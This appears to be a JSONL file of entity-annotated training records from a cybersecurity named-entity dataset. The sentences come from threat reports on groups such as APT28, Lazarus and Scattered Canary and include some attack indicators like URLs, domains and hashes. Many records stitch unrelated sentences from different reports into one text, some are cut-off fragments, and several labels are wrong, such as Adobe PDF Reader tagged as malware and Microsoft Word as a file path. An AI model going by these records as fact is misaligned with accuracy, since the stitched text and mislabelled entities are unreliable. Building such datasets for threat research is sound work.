{"text": "If the malware successfully became the default SMS app , it sends the words “ the app has been replaced ” in Russian . This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries . In other attacks , there was evidence that Felismus was installed using a tool known as Starloader ( detected by Symantec as Trojan.Starloader ) .", "spans": {"ORGANIZATION: aerospace": [[285, 294]], "ORGANIZATION: communication industries": [[299, 323]], "MALWARE: Felismus": [[369, 377]], "MALWARE: Starloader": [[414, 424]], "ORGANIZATION: Symantec": [[439, 447]], "MALWARE: Trojan.Starloader": [[451, 468]]}, "info": {"id": "cyberner_stix_train_006083", "source": "cyberner_stix_train"}}
{"text": "Two security companies , Cymmetria and Kaspersky , each recently released reports on the campaign , most of which are in line with our observations . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": {"ORGANIZATION: Kaspersky": [[39, 48]]}, "info": {"id": "cyberner_stix_train_006084", "source": "cyberner_stix_train"}}
{"text": "These campaigns use PinchDuke samples that were , according to their compilation timestamps , created on the 5th and 12th of November 2008 .", "spans": {"MALWARE: PinchDuke": [[20, 29]]}, "info": {"id": "cyberner_stix_train_006085", "source": "cyberner_stix_train"}}
{"text": "A Base64 encoded string containing the victim's full email address is passed with this URL , prepopulating a fake Google login page displayed to the victim .", "spans": {"TOOL: email": [[53, 58]], "ORGANIZATION: Google": [[114, 120]]}, "info": {"id": "cyberner_stix_train_006086", "source": "cyberner_stix_train"}}
{"text": "McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": {"ORGANIZATION: McAfee": [[0, 6]], "THREAT_ACTOR: Lazarus": [[64, 71], [219, 226]], "MALWARE: malicious document": [[193, 211]], "THREAT_ACTOR: Ke3chang": [[255, 263]], "TOOL: Java": [[285, 289]], "VULNERABILITY: zero-day": [[290, 298]], "VULNERABILITY: CVE-2012-4681": [[315, 328]], "FILEPATH: Microsoft Word": [[374, 388]], "VULNERABILITY: CVE-2010-3333": [[391, 404]], "MALWARE: Adobe PDF Reader": [[411, 427]], "VULNERABILITY: CVE-2010-2883": [[430, 443]]}, "info": {"id": "cyberner_stix_train_006087", "source": "cyberner_stix_train"}}
{"text": "The lure content in the malicious files relates to political affairs in the Middle East , with specific references to the Israeli-Palestinian conflict , tension between Hamas and Fatah , and other political entities in the region .", "spans": {"ORGANIZATION: Hamas": [[169, 174]], "ORGANIZATION: Fatah": [[179, 184]]}, "info": {"id": "cyberner_stix_train_006088", "source": "cyberner_stix_train"}}
{"text": "The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term “ MiniDuke ” to identify the first Duke related malware they found .", "spans": {"THREAT_ACTOR: Duke": [[19, 23], [146, 150]], "ORGANIZATION: Kaspersky Labs": [[80, 94]], "MALWARE: MiniDuke": [[113, 121]]}, "info": {"id": "cyberner_stix_train_006089", "source": "cyberner_stix_train"}}
{"text": "Data collectors are used in conjunction with repeated commands to collect user data including , SMS settings , SMS messages , Call logs , Browser History , Calendar , Contacts , Emails , and messages from selected messaging apps , including WhatsApp , Twitter , Facebook , Kakoa , Viber , and Skype by making /data/data directories of the apps world readable . The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013 , dubbed TEMP.Periscope . Winnti : a260dcf1 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php . Command - line execution of MicroSCADA “ Scilc.exe ” binary and other native MicroSCADA binaries that may be leveraged to execute unauthorized SCIL program / commands .", "spans": {"SYSTEM: WhatsApp": [[241, 249]], "SYSTEM: Twitter": [[252, 259]], "SYSTEM: Facebook": [[262, 270]], "SYSTEM: Kakoa": [[273, 278]], "SYSTEM: Viber": [[281, 286]], "SYSTEM: Skype": [[293, 298]], "THREAT_ACTOR: group": [[389, 394]], "THREAT_ACTOR: cyber espionage actors": [[416, 438]], "THREAT_ACTOR: TEMP.Periscope": [[475, 489]], "THREAT_ACTOR: Winnti": [[492, 498]], "URL: https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php": [[530, 596]]}, "info": {"id": "cyberner_stix_train_006090", "source": "cyberner_stix_train"}}
{"text": "Throughout October and into early November , WikiLeaks published 34 batches of email correspondence stolen from John Podesta ’s personal email account .", "spans": {"TOOL: WikiLeaks": [[45, 54]], "TOOL: email": [[79, 84], [137, 142]]}, "info": {"id": "cyberner_stix_train_006091", "source": "cyberner_stix_train"}}
{"text": "Regarding the timing of these campaigns , it is curious to note that they began only 11 days after President Barack Obama gave a speech on the 5th of April declaring his intention to proceed with the deployment of these missile defenses .", "spans": {}, "info": {"id": "cyberner_stix_train_006092", "source": "cyberner_stix_train"}}
{"text": "Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can′t prove they were related to this particular attack .", "spans": {"THREAT_ACTOR: attackers": [[61, 70]], "VULNERABILITY: CVE-2017-11882": [[182, 196]], "MALWARE: Microsoft Office Equation Editor": [[199, 231]]}, "info": {"id": "cyberner_stix_train_006093", "source": "cyberner_stix_train"}}
{"text": "Japan Post - A private Japanese post , logistics and courier headquartered in Tokyo . Using data from Recorded Future Domain Analysis and combining it with data derived from Recorded Future Network Traffic Analysis , Insikt Group researchers were able to identify a small selection of likely targeted organizations impacted by suspected APT33 activity . Starting in February 2018 , Palo Alto Networks Unit 42 identified a", "spans": {"ORGANIZATION: Japan Post": [[0, 10]], "ORGANIZATION: Recorded Future": [[102, 117]], "ORGANIZATION: Insikt Group": [[217, 229]], "THREAT_ACTOR: APT33": [[337, 342]], "ORGANIZATION: Palo Alto Networks Unit 42": [[382, 408]]}, "info": {"id": "cyberner_stix_train_006094", "source": "cyberner_stix_train"}}
{"text": "Background : Android surveillanceware Early last year , Lookout discovered a sophisticated Android surveillanceware agent that appears to have been created for the lawful intercept market . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": {"SYSTEM: Android": [[13, 20], [91, 98]], "ORGANIZATION: Lookout": [[56, 63]], "VULNERABILITY: Carbanak": [[190, 198]], "ORGANIZATION: consumer": [[266, 274]], "TOOL: Carberp": [[366, 373]], "ORGANIZATION: DeepSight Managed Adversary and Threat Intelligence": [[392, 443]], "ORGANIZATION: MATI": [[446, 450]], "FILEPATH: Backdoor.Powemuddy": [[486, 504]], "THREAT_ACTOR: Seedworm": [[523, 531]], "FILEPATH: Powermud backdoor": [[535, 552]], "MALWARE: POWERSTATS": [[559, 569]], "VULNERABILITY: exploit": [[696, 703]]}, "info": {"id": "cyberner_stix_train_006095", "source": "cyberner_stix_train"}}
{"text": "No guest credentials were observed being stolen at the compromised hotels ; however , in a separate incident that occurred in Fall 2016 , APT28 gained initial access to a victim ’s network via credentials likely stolen from a hotel Wi-Fi network .", "spans": {"THREAT_ACTOR: APT28": [[138, 143]], "TOOL: Wi-Fi network": [[232, 245]]}, "info": {"id": "cyberner_stix_train_006096", "source": "cyberner_stix_train"}}
{"text": "The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents . The Mofang group has been active in relation to the Kyaukphyu sez .", "spans": {"TOOL: MyDoom worm": [[58, 69]], "THREAT_ACTOR: Mofang group": [[133, 145]]}, "info": {"id": "cyberner_stix_train_006097", "source": "cyberner_stix_train"}}
{"text": "SNAKEMACKEREL is an espionage-motivated cyber threat group , also known as Sofacy , Pawn Storm , Sednit , Fancy Bear , APT28 , Group 74 , Tsar Team , and Strontium .", "spans": {"THREAT_ACTOR: SNAKEMACKEREL": [[0, 13]], "THREAT_ACTOR: Sofacy": [[75, 81]], "THREAT_ACTOR: Pawn Storm": [[84, 94]], "THREAT_ACTOR: Sednit": [[97, 103]], "THREAT_ACTOR: Fancy Bear": [[106, 116]], "THREAT_ACTOR: APT28": [[119, 124]], "THREAT_ACTOR: Group 74": [[127, 135]], "THREAT_ACTOR: Tsar Team": [[138, 147]], "THREAT_ACTOR: Strontium": [[154, 163]]}, "info": {"id": "cyberner_stix_train_006098", "source": "cyberner_stix_train"}}
{"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets . GhostNet represents a network of compromised computers resident in high-value political , economic , and media locations spread across numerous countries worldwide .", "spans": {"THREAT_ACTOR: PittyTiger": [[0, 10]], "ORGANIZATION: social engineering": [[21, 39]], "ORGANIZATION: political": [[263, 272]], "ORGANIZATION: economic": [[275, 283]], "ORGANIZATION: media": [[290, 295]]}, "info": {"id": "cyberner_stix_train_006099", "source": "cyberner_stix_train"}}
{"text": "The Sofacy group has leveraged open source or freely available tools and exploits in the past but this is the first time that Unit 42 has observed them leveraging the Koadic toolkit .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]], "ORGANIZATION: Unit 42": [[126, 133]], "TOOL: Koadic": [[167, 173]]}, "info": {"id": "cyberner_stix_train_006100", "source": "cyberner_stix_train"}}
{"text": "Palo Alto Networks customers are protected from Downeks and Quasar used in this attack :", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "MALWARE: Downeks": [[48, 55]], "MALWARE: Quasar": [[60, 66]]}, "info": {"id": "cyberner_stix_train_006101", "source": "cyberner_stix_train"}}
{"text": "How do Android devices become infected ? This is evidence of shared motivation and intent to target the SWIFT system by the North Korean operators performing the reconnaissance and APT38 which later targeted that organization . We defined two patterns for analysis of the ANEL sample . the second with invalid handle 0 , will return 0 or should be 0 in normal systems , this could be antisandboxemulation not sure as the functions return value is not used .", "spans": {"THREAT_ACTOR: operators": [[137, 146]], "THREAT_ACTOR: APT38": [[181, 186]], "MALWARE: ANEL": [[272, 276]]}, "info": {"id": "cyberner_stix_train_006102", "source": "cyberner_stix_train"}}
{"text": "Many of the strings in the application are XOR 'd with the key Kjk1MmphFG : After some additional requests , the dropper made a POST request to https : //54.71.249.137/56e087c9-fc56-49bb-bbd0-4fafc4acd6e1 which returned a zip file containing the second stage binaries . In early November 2018 , CrowdStrike observed activity from the HELIX KITTEN adversary at a customer in the telecommunications vertical . Additionally the attackers implemented anti-VM ( and sandbox ) and anti-analysis tricks to hide the malicious activities to the analyst . Harrison signed his threatening missive with the salutation , “ We are legion , ” suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": {"ORGANIZATION: CrowdStrike": [[295, 306]], "THREAT_ACTOR: HELIX KITTEN": [[334, 346]], "ORGANIZATION: telecommunications": [[378, 396]], "TOOL: anti-VM": [[447, 454]], "TOOL: sandbox": [[461, 468]], "TOOL: anti-analysis tricks": [[475, 495]], "THREAT_ACTOR: Harrison": [[546, 554]], "ORGANIZATION: Ashley Madison": [[685, 699]]}, "info": {"id": "cyberner_stix_train_006103", "source": "cyberner_stix_train"}}
{"text": "In the following paragraphs , we outline our efforts to discover other applications from the same developer and protect our users from it . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . Filename: beauty.scr .", "spans": {"MALWARE: malicious documents": [[169, 188]], "VULNERABILITY: CVE-2017-0199": [[200, 213]], "TOOL: LATENTBOT malware": [[239, 256]], "FILEPATH: beauty.scr": [[269, 279]]}, "info": {"id": "cyberner_stix_train_006104", "source": "cyberner_stix_train"}}
{"text": "According to Wikipedia , the CSS was formed in 1972 to integrate the NSA and the Service Cryptologic Elements ( SCE ) of the U.S armed forces . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": {"ORGANIZATION: banking": [[238, 245]], "TOOL: emails": [[299, 305]], "ORGANIZATION: bank employees": [[333, 347]]}, "info": {"id": "cyberner_stix_train_006105", "source": "cyberner_stix_train"}}
{"text": "PHA authors usually try to hide their tracks , so attribution is difficult . At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs : the cpg Corporation . IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control ( C2 ) server and uniform resource locator ( URL ) path . Per Microsoft ’s blog , they have identified additional post - exploitation activities , including : • Compression of data for exfiltration via 7 - Zip . • Use of Exchange PowerShell Snap - ins to export mailbox data .", "spans": {"ORGANIZATION: cpg Corporation": [[202, 217]], "MALWARE: IRONHALO": [[220, 228]], "TOOL: command-and-control": [[328, 347]], "TOOL: C2": [[350, 352]], "ORGANIZATION: Microsoft ’s": [[410, 422]]}, "info": {"id": "cyberner_stix_train_006106", "source": "cyberner_stix_train"}}
{"text": "mobile_treats_2013_06s It extorts money from users by threatening to block the smartphone : it displays a message demanding $ 500 to unblock the device . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including research and pharmaceutical companies . Once the RAT is installed on the host it will be used to administer the client , exfiltrate data , or leverage the client as a pivot to attack an organization ’s internal infrastructure . The group has since earned infamy for being involved in malicious activities associated with targeted attacks , such as deploying spear - phishing campaigns and building a backdoor .", "spans": {"TOOL: Epic Turla": [[175, 185]], "ORGANIZATION: pharmaceutical companies": [[277, 301]], "TOOL: RAT": [[313, 316]]}, "info": {"id": "cyberner_stix_train_006107", "source": "cyberner_stix_train"}}
{"text": "( read SMS messages ) Obviously a fairly significant list of permissions of which many are suspicious , especially when combined . Originally , the main infection vector of Blue Termite was spear-phishing emails . Threat Spotlight : Group 72 , Opening the ZxShell . Adversaries may communicate using a protocol and port pairing that are typically not associated .", "spans": {"TOOL: Blue Termite": [[173, 185]], "THREAT_ACTOR: Group 72": [[233, 241]], "MALWARE: ZxShell": [[256, 263]], "THREAT_ACTOR: Adversaries": [[266, 277]]}, "info": {"id": "cyberner_stix_train_006108", "source": "cyberner_stix_train"}}
{"text": "The malicious payload was spread across multiple PowerShell scripts , making its execution difficult to trace .", "spans": {"MALWARE: malicious payload": [[4, 21]], "TOOL: multiple PowerShell scripts": [[40, 67]]}, "info": {"id": "cyberner_stix_train_006109", "source": "cyberner_stix_train"}}
{"text": "Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"THREAT_ACTOR: APT41": [[41, 46]], "THREAT_ACTOR: Patchwork": [[214, 223]], "VULNERABILITY: exploit": [[253, 260]], "VULNERABILITY: CVE-2015-1641": [[393, 406]], "VULNERABILITY: CVE-2017-11882": [[411, 425]]}, "info": {"id": "cyberner_stix_train_006110", "source": "cyberner_stix_train"}}
{"text": "In the Windows space , Twitter , founded in 2006 , was first used to control botnets as early as in 2009 . Using personal information obtained from various sources , Scattered Canary started perpetrating fraud against US federal and state government agencies . We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations , while a substantially smaller units within the group , which we have dubbed Bluenoroff , is responsible for financial profit .", "spans": {"SYSTEM: Windows": [[7, 14]], "ORGANIZATION: Twitter": [[23, 30]], "THREAT_ACTOR: Scattered Canary": [[166, 182]], "ORGANIZATION: state government agencies": [[233, 258]], "THREAT_ACTOR: Lazarus Group": [[277, 290]], "THREAT_ACTOR: Bluenoroff": [[441, 451]]}, "info": {"id": "cyberner_stix_train_006111", "source": "cyberner_stix_train"}}
{"text": "In this blog , Unit 42 provides details of the tools and tactics we observed on these compromised SharePoint servers , explain how we believe these connect to the Emissary Panda threat group . This investigation by the Agari Cyber Intelligence Division into the cybercriminal group we’ve named Scattered Canary offers unprecedented visibility into eleven years of fraud and criminal activities , and the growth of a 419 startup into a fully operational BEC business . While this criminal organization’s activities now center around BEC , and extend to romance scams , credit card fraud , check fraud , fake job listings , credential harvesting , tax schemes , and more , these actors came from much humbler beginnings , starting with basic Craigslist scams in 2008 . On November 29 , 2018 , Scattered Canary sent an attack email to Agari CFO Raymond Lim , enquiring as to his availability to send out a domestic wire transfer . Many feel that they have a home team advantage living in Nigeria , where they are free to pay off law enforcement to look the other ACT . Scattered Canary’s fraudulent history can be traced as far back as October 2008 , when the group first arrived on the cybercriminal circuit . By March 2016 , one of Scattered Canary’s members had built enough trust with a romance victim—who we’ll call Jane—that she became a frequent source of new mule accounts for the group . Alpha’s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . By all accounts , late 2015 was the beginning of BEC for Scattered Canary . The first type of attack Scattered Canary pivoted to was credential phishing . Between July 2015 and February 2016 , Scattered Canary’s primary focus seemed to be mass harvesting general credentials using a Google Docs phishing page . In the first few months of their credential phishing ventures , Scattered Canary’s sights were mostly set on Asian targets—Malaysia and Japan , in particular . In November 2015 , the group started to focus on North American users , mostly in the United States . This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills .", "spans": {"ORGANIZATION: Unit 42": [[15, 22]], "TOOL: SharePoint servers": [[98, 116]], "THREAT_ACTOR: Emissary Panda": [[163, 177]], "ORGANIZATION: Agari Cyber Intelligence": [[219, 243]], "THREAT_ACTOR: Scattered Canary": [[294, 310], [791, 807], [1628, 1644], [1672, 1688], [2219, 2235]], "ORGANIZATION: business": [[457, 465]], "ORGANIZATION: organization’s": [[488, 502]], "TOOL: email": [[823, 828]], "THREAT_ACTOR: they": [[1001, 1005]], "THREAT_ACTOR: Scattered Canary’s": [[1066, 1084], [1231, 1249], [1764, 1782], [1946, 1964]], "THREAT_ACTOR: Alpha’s": [[1394, 1401]]}, "info": {"id": "cyberner_stix_train_006112", "source": "cyberner_stix_train"}}
{"text": "China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . Zahlungsinformationen 01.06.2017.zip .", "spans": {"MALWARE: China Chopper": [[0, 13]], "FILEPATH: Zahlungsinformationen 01.06.2017.zip": [[134, 170]]}, "info": {"id": "cyberner_stix_train_006113", "source": "cyberner_stix_train"}}
{"text": "Based on what we currently know about the targets chosen by the Dukes over the past 7 years , they appear to have consistently targeted entities that deal with foreign policy and security policy matters .", "spans": {"THREAT_ACTOR: Dukes": [[64, 69]]}, "info": {"id": "cyberner_stix_train_006114", "source": "cyberner_stix_train"}}
{"text": "Its origins can be traced back to the Storm Worm , a botnet that emerged in 2007 and was one of the earliest criminal malware infrastructures to leverage peer-to-peer technology . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"ORGANIZATION: technology": [[167, 177]], "ORGANIZATION: Kaspersky": [[180, 189]], "THREAT_ACTOR: BlackOasis group": [[200, 216]], "TOOL: Adobe Flash Player": [[234, 252]], "VULNERABILITY: zero-day": [[253, 261]], "VULNERABILITY: CVE-2016-4117": [[278, 291]], "MALWARE: FinSpy": [[338, 344]]}, "info": {"id": "cyberner_stix_train_006115", "source": "cyberner_stix_train"}}
{"text": "It was an existing business model when computer-based banking malware was the only form of banking malware and has shifted to the Android equivalent a few years later . In some cases , Machete trick new victims by sending real documents that had been stolen on the very same day . Although APT38 is distinct from other TEMP.Hermit activity , both groups operate consistently within the interests of the North Korean state .", "spans": {"SYSTEM: Android": [[130, 137]], "THREAT_ACTOR: Machete": [[185, 192]], "THREAT_ACTOR: APT38": [[290, 295]], "THREAT_ACTOR: groups": [[347, 353]]}, "info": {"id": "cyberner_stix_train_006116", "source": "cyberner_stix_train"}}
{"text": "XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8]]}, "info": {"id": "cyberner_stix_train_006117", "source": "cyberner_stix_train"}}
{"text": "The email message test : the message as written ( left ) and as available in the database ( right ) Third , we documented the trojan retrieving the Google Authenticator 2FA code . One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus aka OilRig , APT34 . Furthermore , the Advanced Threat Research team has discovered Proxysvc , which appears to be an undocumented implant .", "spans": {"SYSTEM: Google Authenticator": [[148, 168]], "THREAT_ACTOR: Crambus": [[293, 300]], "THREAT_ACTOR: OilRig": [[305, 311]], "THREAT_ACTOR: APT34": [[314, 319]], "ORGANIZATION: Advanced Threat Research": [[340, 364]], "MALWARE: Proxysvc": [[385, 393]]}, "info": {"id": "cyberner_stix_train_006118", "source": "cyberner_stix_train"}}
{"text": "Yet the most-recent posting covering TTPs from initial access through prerequisites to enable final delivery of effects on target ( deploying TRITON S-MAL/TRISIS ) avoids the use of the TEMP.Veles term entirely .", "spans": {"MALWARE: TRITON S-MAL/TRISIS": [[142, 161]], "THREAT_ACTOR: TEMP.Veles": [[186, 196]]}, "info": {"id": "cyberner_stix_train_006119", "source": "cyberner_stix_train"}}
{"text": "format Asacub format Decrypted data from Asacub traffic : { “ data ” : ” 2015:10:14_02:41:15″ , ” id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” text ” : ” SSB0aG91Z2h0IHdlIGdvdCBwYXN0IHRoaXMhISBJJ20gbm90IGh1bmdyeSBhbmQgbmU= ” , ” number ” : ” 1790″ , ” type In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims . 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a install . Utilizing multiple security solutions may become even more important as the level of sophistication in malware grows .", "spans": {"TOOL: SWCs": [[284, 288]], "THREAT_ACTOR: TG-3390": [[333, 340]], "FILEPATH: 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a": [[396, 460]], "FILEPATH: install": [[461, 468]]}, "info": {"id": "cyberner_stix_train_006120", "source": "cyberner_stix_train"}}
{"text": "] ee , is the same one used in the Android version of Project Spy . Once inside the network , the GCMAN group uses legitimate and penetration testing tools such as Putty , VNC , and Meterpreter for lateral movement . the new code tries to trace the first blocks to obtain the value and reconnects block number 1 and 2 as successors of block number 7 , They collect , process , and analyze data about cyberthreats from a variety of public and private sources , creating timely , actionable , and engaging intelligence to keep organizations and our global partners up - to - date about today ’s threat landscape .", "spans": {"SYSTEM: Android": [[35, 42]], "SYSTEM: Project Spy": [[54, 65]], "THREAT_ACTOR: GCMAN group": [[98, 109]], "TOOL: Putty": [[164, 169]], "TOOL: VNC": [[172, 175]], "TOOL: Meterpreter": [[182, 193]]}, "info": {"id": "cyberner_stix_train_006121", "source": "cyberner_stix_train"}}
{"text": "Displaying HTML pages We ’ ll now look at the HTML pages that Rotexy displays and the actions performed with them . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Analysis of RASPITE tactics , techniques , and procedures ( TTPs ) indicate the group has been active in some form since early - to mid-2017 .", "spans": {"MALWARE: Rotexy": [[62, 68]], "MALWARE: documents": [[120, 129]], "VULNERABILITY: CVE-2012-0158": [[213, 226]], "VULNERABILITY: Microsoft Word vulnerabilities": [[282, 312]], "THREAT_ACTOR: RASPITE": [[369, 376]]}, "info": {"id": "cyberner_stix_train_006122", "source": "cyberner_stix_train"}}
{"text": "These 12 hours could have been used to crack a hashed password offline .", "spans": {}, "info": {"id": "cyberner_stix_train_006123", "source": "cyberner_stix_train"}}
{"text": "Using the SMS has an initial infection vector is another possibility for the exfiltration . Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials . . Understand how the most dangerous Android threat could upend your entire business and how a devious cybercrime campaign on Windows involves in - depth reconnaissance to deliver the damaging malware to your network .", "spans": {"THREAT_ACTOR: Seedworm": [[92, 100]], "TOOL: LaZagne": [[137, 144]], "TOOL: Crackmapexec": [[149, 161]], "TOOL: Android": [[244, 251]], "SYSTEM: Windows": [[333, 340]]}, "info": {"id": "cyberner_stix_train_006124", "source": "cyberner_stix_train"}}
{"text": "Given this , I iterated over all 171 samples and extracted the following URL ’s where PowerShell is downloading a payload :", "spans": {"TOOL: PowerShell": [[86, 96]]}, "info": {"id": "cyberner_stix_train_006125", "source": "cyberner_stix_train"}}
{"text": "The spring of 2010 saw continued PinchDuke campaigns against Turkey and Georgia , but also numerous campaigns against other members of the Commonwealth of Independent States such as Kazakhstan , Kyrgyzstan , Azerbaijan and Uzbekistan .", "spans": {"MALWARE: PinchDuke": [[33, 42]]}, "info": {"id": "cyberner_stix_train_006126", "source": "cyberner_stix_train"}}
{"text": "com.schwab.mobile com.americanexpress.android.acctsvcs.us com.pnc.ecommerce.mobile com.regions.mobbanking com.clairmail.fth com.grppl.android.shell.BOS com.tdbank com.huntington.m com.citizensbank.androidapp com.usbank.mobilebanking com.ally.MobileBanking com.key.android com.unionbank.ecommerce.mobile.android com.mfoundry.mb.android.mb_BMOH071025661 It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data exfiltration from high-profile victim organizations . Rancor : Connect.bafunpda.xyz . The archive contained a RAR SFX which installed the malware and showed an empty PDF decoy .", "spans": {"THREAT_ACTOR: attackers": [[408, 417]], "TOOL: Naikon proxies": [[425, 439]], "THREAT_ACTOR: Rancor": [[588, 594]], "DOMAIN: Connect.bafunpda.xyz": [[597, 617]]}, "info": {"id": "cyberner_stix_train_006127", "source": "cyberner_stix_train"}}
{"text": "If the server returns this flag as positive , the app will not trigger the adware payload . Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff . The last identified campaign where KONNI was used was named Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.scr .", "spans": {"ORGANIZATION: Kaspersky": [[92, 101]], "THREAT_ACTOR: Scarcruft": [[191, 200]], "THREAT_ACTOR: Bluenoroff": [[205, 215]], "MALWARE: KONNI": [[253, 258]], "FILEPATH: RC_Office_Coordination_Associate.scr": [[323, 359]]}, "info": {"id": "cyberner_stix_train_006128", "source": "cyberner_stix_train"}}
{"text": "Sofacy ( also known as “ Fancy Bear ” , “ Sednit ” , “ STRONTIUM ” and “ APT28 ” ) is an advanced threat group that has been active since around 2008 , targeting mostly military and government entities worldwide , with a focus on NATO countries .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "THREAT_ACTOR: Fancy Bear": [[25, 35]], "THREAT_ACTOR: Sednit": [[42, 48]], "THREAT_ACTOR: STRONTIUM": [[55, 64]], "THREAT_ACTOR: APT28": [[73, 78]], "ORGANIZATION: NATO": [[230, 234]]}, "info": {"id": "cyberner_stix_train_006129", "source": "cyberner_stix_train"}}
{"text": "The server replies with the actual malicious payload , which includes JavaScript code , a user-agent string and URLs controlled by the malware author . The Chinese intelligence apparatus has been reported on under many names , including Winnti , PassCV , APT17 , Axiom , LEAD , BARIUM , Wicked Panda , and GREF . Otherwise , ZxShell tries to connect to the first item of the list . This allows application control solutions to block unknown threats .", "spans": {"MALWARE: ZxShell": [[325, 332]]}, "info": {"id": "cyberner_stix_train_006130", "source": "cyberner_stix_train"}}
{"text": "Even sophisticated actors are using lower cost , less technologically impressive means like phishing to spread their malware because it 's cheap and very effective , especially on mobile devices where there are more ways to interact with a victim ( messaging apps , social media apps , etc . Our analysis shows that the cybercriminals behind the attack against an online casino in Central America , and several other targets in late-2017 , were most likely the infamous Lazarus hacking group . The second ZIP structure was treated as extra data; hence, a warning was added to the extracted image file’s . /Library / LaunchDaemons / com.studentd.agent.plist", "spans": {"THREAT_ACTOR: cybercriminals": [[320, 334]], "THREAT_ACTOR: Lazarus hacking group": [[470, 491]]}, "info": {"id": "cyberner_stix_train_006131", "source": "cyberner_stix_train"}}
{"text": "The first versions of these new USB stealer modules appeared around February 2015 and the latest appear to have been compiled in May 2015 .", "spans": {"TOOL: USB stealer": [[32, 43]]}, "info": {"id": "cyberner_stix_train_006132", "source": "cyberner_stix_train"}}
{"text": "Location services to enable ( GPS/network ) tracking : The email command and control protocol . These implants are variations of earlier forms of Bankshot , a remote access tool that gives an attacker full capability on a victim 's system . APT33 : ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3 S-SHA2 Remcos . LIGHTWORK ( filename : OT_T855_IEC104_GR.exe ) ( MD5 : 7b6678a1c0000344f4faf975c0cfc43d ) is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": {"TOOL: Bankshot": [[146, 154]], "THREAT_ACTOR: attacker": [[192, 200]], "THREAT_ACTOR: APT33": [[241, 246]], "MALWARE: ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3 S-SHA2 Remcos": [[249, 327]], "TOOL: LIGHTWORK": [[330, 339]]}, "info": {"id": "cyberner_stix_train_006133", "source": "cyberner_stix_train"}}
{"text": "This malware is simplistic in comparison to some modern-day Android malware . Their arsenal includes network-driven backdoors , several generations of modular backdoors , harvesting tools , and wipers . While the attackers primarily targeted East Asian governments in the past , they have also started targeting a telecommunications company and electronics manufacturers . We took google - analytics as an example , but other services can also be used .", "spans": {"SYSTEM: Android": [[60, 67]], "TOOL: network-driven backdoors": [[101, 125]], "TOOL: modular backdoors": [[151, 168]], "TOOL: harvesting tools": [[171, 187]], "TOOL: wipers": [[194, 200]], "SYSTEM: google - analytics": [[381, 399]]}, "info": {"id": "cyberner_stix_train_006134", "source": "cyberner_stix_train"}}
